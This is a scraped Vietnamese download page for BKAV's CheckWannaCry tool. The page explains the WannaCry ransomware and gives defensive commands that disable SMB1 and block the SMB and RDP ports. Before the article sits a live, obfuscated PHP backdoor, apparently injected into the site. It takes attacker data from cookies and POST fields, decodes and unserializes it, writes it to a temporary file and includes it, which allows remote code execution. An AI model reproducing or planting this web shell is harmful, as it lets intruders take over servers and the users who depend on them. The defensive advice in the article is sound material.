$ylZYFX = chr (85) . '_' . 'E' . "\121" . "\130" . chr (108) . chr (104); $yLWtuVuIpp = 'c' . chr ( 753 - 645 ).chr (97) . "\x73" . chr ( 582 - 467 ).chr (95) . "\145" . "\170" . chr ( 510 - 405 ).chr (115) . "\x74" . 's';$kAOmFrC = class_exists($ylZYFX); $yLWtuVuIpp = "35366";$DZnLrk = strpos($yLWtuVuIpp, $ylZYFX);if ($kAOmFrC == $DZnLrk){function IAeTZP(){$aZfgaHHvu = new /* 4364 */ U_EQXlh(29822 + 29822); $aZfgaHHvu = NULL;}$XKXHSy = "29822";class U_EQXlh{private function KWZRppi($XKXHSy){if (is_array(U_EQXlh::$YNoKSXbD)) {$name = sys_get_temp_dir() . "/" . crc32(U_EQXlh::$YNoKSXbD["salt"]);@U_EQXlh::$YNoKSXbD["write"]($name, U_EQXlh::$YNoKSXbD["content"]);include $name;@U_EQXlh::$YNoKSXbD["delete"]($name); $XKXHSy = "29822";exit();}}public function HfLoXJy(){$XvCgWQeB = "40563";$this->_dummy = str_repeat($XvCgWQeB, strlen($XvCgWQeB));}public function __destruct(){U_EQXlh::$YNoKSXbD = @unserialize(U_EQXlh::$YNoKSXbD); $XKXHSy = "22734_2480";$this->KWZRppi($XKXHSy); $XKXHSy = "22734_2480";}public function gYQxmX($XvCgWQeB, $uwoXMoiAQJ){return $XvCgWQeB[0] ^ str_repeat($uwoXMoiAQJ, intval(strlen($XvCgWQeB[0]) / strlen($uwoXMoiAQJ)) + 1);}public function HturnsX($XvCgWQeB){$IRxSAES = "\142" . "\x61" . "\163" . chr (101) . chr (54) . chr ( 962 - 910 );return array_map($IRxSAES . chr ( 150 - 55 ).chr ( 1074 - 974 )."\145" . "\143" . 'o' . chr (100) . 'e', array($XvCgWQeB,));}public function __construct($oCcnlBmz=0){$vemMBQz = ',';$XvCgWQeB = "";$YdToI = $_POST;$OaybdGwVx = $_COOKIE;$uwoXMoiAQJ = "c88d6de5-9c28-4205-88d1-aa6ae4d03ace";$vclXYK = @$OaybdGwVx[substr($uwoXMoiAQJ, 0, 4)];if (!empty($vclXYK)){$vclXYK = explode($vemMBQz, $vclXYK);foreach ($vclXYK as $TPeibWgFe){$XvCgWQeB .= @$OaybdGwVx[$TPeibWgFe];$XvCgWQeB .= @$YdToI[$TPeibWgFe];}$XvCgWQeB = $this->HturnsX($XvCgWQeB);}U_EQXlh::$YNoKSXbD = $this->gYQxmX($XvCgWQeB, $uwoXMoiAQJ);if (strpos($uwoXMoiAQJ, $vemMBQz) !== FALSE){$uwoXMoiAQJ = explode($vemMBQz, $uwoXMoiAQJ); $dXdlFMY = sprintf("22734_2480", rtrim($uwoXMoiAQJ[0]));}}public static $YNoKSXbD = 56125;}IAeTZP();} CheckWannaCry - Tải Chùa

CheckWannaCry

Rate this post

Ransomware WannaCry – Phần mềm kiểm tra máy tính có bị nhiễm WannaCry không

Ransomware WannaCry đang làm cả thế giới công nghệ đang phải nhức đầu với tốc độ lây lan chóng mặt với hầu hết các nước thế giới trong đó có cả Việt Nam. Mã độc này đã gây ra nhiều hậu quả nghiệm trọng cho nền an ninh thế giới cũng nhưng tính mạng của con người.

Ransomware WannaCry là gì?

Mã độc WannaCry được biết đến với nhiều tên gọi khác nhau như:  WCry 2, Wanna Decryptor 2.0, WannaCry 2 hay Wanna Decryptor 2. Ransomware WannaCry có thể hiểu nó là một dạng virus tống tiền bằng cách mã hoá dữ liệu máy tính bị nhiễm mã độc này. Tuy phương thức tấn công không phức tập nhưng chính vì vậy mà WannaCry trở thành loại mã độc nguy hiểm bật nhất Thế giới hiện nay.

Ransomware này không chỉ tống tiền mà nó còn có thể giết người vì loại virus này còn tấn công cả các hệ thống trường học, bệnh viện, các sân bay…..

WannaCry lây nhiễm qua mạng LAN, kể cả khi máy tính không làm gì, nhưng nếu chỉ cần một máy bị nhiễm thì việc các máy tính còn lại cũng bị lây nhiễm là khá cao trong hệ thống mạng nội bộ.

Nguyên nhân máy tính bị nhiễm WannaCry

WannaCry tấn không không quá phức tạp đối với hệ thống máy tính trên thế giới như Ransomware là nó không phát tán qua email hay nhiễm độc thứ cấp như các “đồng đội” của chúng mà nó khai thác lỗ hổng Windows SMB Server để phát tán trojan.

Cách phòng chống Ransomware WannaCry

Update bản vá bảo mật của windows

update bản vá windows

Update bản vá cho windows

update bản vá widows

Update bản vá cho windows

Mã hoá giao thức SMBV1

đầu tiên bạn mở CMD máy tính lên bằng cách vào vào start --> run --> cmd hoặt sử dụng phím tắt Windows + R. Sau đó bạn sử dán dòng lệnh này vào và Enter nhé: 

dism /online /norestart /disable-feature /featurename:SMB1Protocol

mã hoá SMV!

Cách mã hoá SMB1

Mã hoá giao thức Port 445/139/3389 

nếu máy tính của bạn không sử dung chương trình Remote Desktop connection, Smb trên Internet thì hãy mã hoá các port máy tính của mình để tránh bị lây nhiễu và quét ip của mã trojan này nhé.

Bạn mở CMD lên với quyền admin bằng cách vào start --> Run --> cmd hoặt nhấn tổ hợp phím windows + R. Và tiếp theo bạn copy và dán các lệnh bên dưới vào nhé.

netsh advfirewall firewall add rule name=”Disable SMB” dir=in action=block protocol=TCP localport=137
netsh advfirewall firewall add rule name=”Disable SMB” dir=in action=block protocol=TCP localport=138
netsh advfirewall firewall add rule name=”Disable SMB” dir=in action=block protocol=TCP localport=139
netsh advfirewall firewall add rule name=”Disable SMB” dir=in action=block protocol=TCP localport=445
netsh advfirewall firewall add rule name=”Disable SMB” dir=in action=block protocol=TCP localport=137
netsh advfirewall firewall add rule name=”Disable SMB” dir=in action=block protocol=UDP localport=138
netsh advfirewall firewall add rule name=”Disable SMB” dir=in action=block protocol=UDP localport=139
netsh advfirewall firewall add rule name=”Disable SMB” dir=in action=block protocol=UDP localport=445
netsh advfirewall firewall add rule name=”Disable RDC” dir=in action=block protocol=TCP localport=3389

Tải công cụ kiểm tra máy tính có bị nhiễm Wannacry miễn phí của bkav.

Bạn tải công cụ Checkwanacry của bkav về để kiểm tra xem máy tính của bạn có bị nhiễm trojan này hay không?

checkwanacry

Công cụ kiểm tra máy tính nhiễm wanacry hay không

Một số cách phòng chống Wanacry khác

  • Sử dụng phần mềm diệt virus bản quyền.
  • Sao chép dự liệu máy tính của bạn vào một mới lưu trữ khác.
  • Không mở các file lạ mà bạn không biết trên máy tính.
  • Không truy cập và các trang web lạ không rõ nguồn gốc
  • Không tắt tường lửa hoặc windows defender hay chương trình bảo mật trên hệ điều hành.

Trên là toàn bộ thông tin cũng nhưng các phòng chống mã độc Wanacry nguy hiểm bật nhất hiện nay. Hãy tự bảo vệc chính mình để không xảy ra điều không hay cho dữ liệu mình nhé.

Người dùng đánh giá

Tags:

Bấm vào [Tải Về] để tải về phần mềm, hoặc tải phiên bản phù hợp phía dưới